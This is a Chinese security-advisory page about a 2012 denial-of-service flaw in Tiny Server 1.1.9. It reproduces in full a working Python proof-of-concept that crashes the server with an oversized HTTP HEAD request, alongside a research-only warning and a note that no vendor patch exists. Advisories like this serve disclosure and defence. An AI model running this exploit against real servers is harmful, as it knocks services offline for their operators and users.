Welcome 微信登录
编程资源 图片资源库 蚂蚁家优选 PDF转换器

首页 / 操作系统 / Linux / Tiny Server HTTP HEAD请求远程拒绝服务漏洞

发布日期:2012-03-20
更新日期:2012-03-21受影响系统:
Tiny Server Tiny Server 1.1.9
描述:
--------------------------------------------------------------------------------
BUGTRAQ  ID: 52635Tiny Server是个基本的HTTP服务器。Tiny Server在实现上存在远程拒绝服务漏洞,成功利用后可允许远程攻击者使受影响应用程序崩溃。<*来源:Brock Haun
  *>测试方法:
--------------------------------------------------------------------------------警 告以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!Brock Haun ()提供了如下测试方法:#!/usr/bin/python
###############################################################################
# Overflow exploiting a vulnerability in Tiny Server <=1.1.9 (HTTP) HEAD request.
# Date of Discovery: 3/19/2012 (0 Day)
# Author: Brock Haun
# Vulnerable Software Download: http://tinyserver.sourceforge.net/tinyserver_full.zip
# Software Version: <=1.1.9
# Target OS: Windows (Tested on Windows 7)
###############################################################################
import httplib,sys
if (len(sys.argv) != 3):
print " [*]Usage:  ./" + sys.argv[0] + " <target
host> <port>"
sys.exit()
host = sys.argv[1]
port = sys.argv[2]
buffer = "A" * 100 + "HTTP/1.0 "
print " [*]*************************************************"
print "[*] Tiny Server <= 1.1.0(HTTP) HEAD request overflow"
print "[*] Written by Brock Haun"
print "[*] security.brockhaun@gmail.com"
print "[*]************************************************* "
try:
print " [*] Attempting connection."
httpServ = httplib.HTTPConnection(host , port)
httpServ.connect()
print " [*] Connected."
print " [*] Sending crash buffer."
httpServ.request("HEAD" , buffer)
print " [*] Done! Target should be unresponsive!"
except:
print " [***] Connection error. Something went wrong. :("
httpServ.close()
sys.exit()建议:
--------------------------------------------------------------------------------
厂商补丁:Tiny Server
-----------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:http://tinyserver.sourceforge.net/at32 Reverse Proxy多个HTTP标头字段拒绝服务漏洞Aruba Networks ArubaOS远程命令注入漏洞相关资讯      Tiny Server 
  • Tiny Server远程目录遍历漏洞  (10/10/2012 08:02:52)
本文评论 查看全部评论 (0)
版权所有©石家庄振强科技有限公司2024 冀ICP备08103738号-5 网站地图
表情: 姓名: 字数


评论声明
  • 尊重网上道德,遵守中华人民共和国的各项有关法律法规
  • 承担一切因您的行为而直接或间接导致的民事或刑事法律责任
  • 本站管理人员有权保留或删除其管辖留言中的任意内容
  • 本站有权在网站内转载或引用您的评论
  • 参与本评论即表明您已经阅读并接受上述条款